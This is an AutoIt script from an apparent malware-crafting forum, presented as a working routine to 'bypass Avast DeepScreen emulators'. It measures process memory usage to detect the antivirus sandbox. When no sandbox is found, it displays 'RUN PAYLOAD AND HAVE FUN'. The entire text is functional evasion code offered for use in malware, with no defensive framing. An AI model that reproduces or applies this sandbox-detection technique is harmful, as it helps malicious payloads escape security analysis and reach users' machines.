Feliz Navidad !!!
;========================================================================
; Func sAvastDeepScreenCheck
; Detect if file is running under Avast DeepScreen emulator environment
; Bypass Avast DeepScreen Emulators by Memory Usage
; Author : M3
; Forum : http://indetectables.net/forum.php
; Usage : sAvastDeepScreenCheck()
; Release : 12/12/2016
; Tested under Win7 32 / Win10 x64
;========================================================================
Local $sDeepScreenAllocatedBytes = 100000
Local $sCheck = sAvastDeepScreenCheck()
If $sCheck > $sDeepScreenAllocatedBytes Then
MsgBox(16 , "[ AVAST SANDBOX DETECTED ]" , "FILE IS RUNNING UNDER AVAST SANDBOX !!!" , 4)
Else
MsgBox(64 , "[ PROCESS UNDER SAFE ZONE ]" , "RUN PAYLOAD AND HAVE FUN !!!" , 4)
EndIf
Func sAvastDeepScreenCheck()
Local $sGetCurrentProcess , $sStructParams , $sStructMemoryCount , $sSizeStruct , $sStructGetPtr , $sGetMemoryInfo , $sGetMemoryUsage
$sGetCurrentProcess = DllCall("kernel32.dll", "hwnd", "GetCurrentProcess")
If @error Then Return
$sGetCurrentProcess = $sGetCurrentProcess[0]
$sStructParams = "dword; dword; uint workingsetsize; uint memorysize; uint; uint; uint; uint; uint; uint"
$sStructMemoryCount = DllStructCreate($sStructParams)
$sSizeStruct = DllStructGetSize($sStructMemoryCount)
$sStructGetPtr = DllStructGetPtr($sStructMemoryCount)
$sGetMemoryInfo = DllCall("Psapi.dll", "int", "GetProcessMemoryInfo", "hwnd", $sGetCurrentProcess, "ptr", $sStructGetPtr, "int", $sSizeStruct)
$sGetMemoryUsage = DllStructGetData($sStructMemoryCount, "memorysize") / 1024
Return $sGetMemoryUsage
EndFunc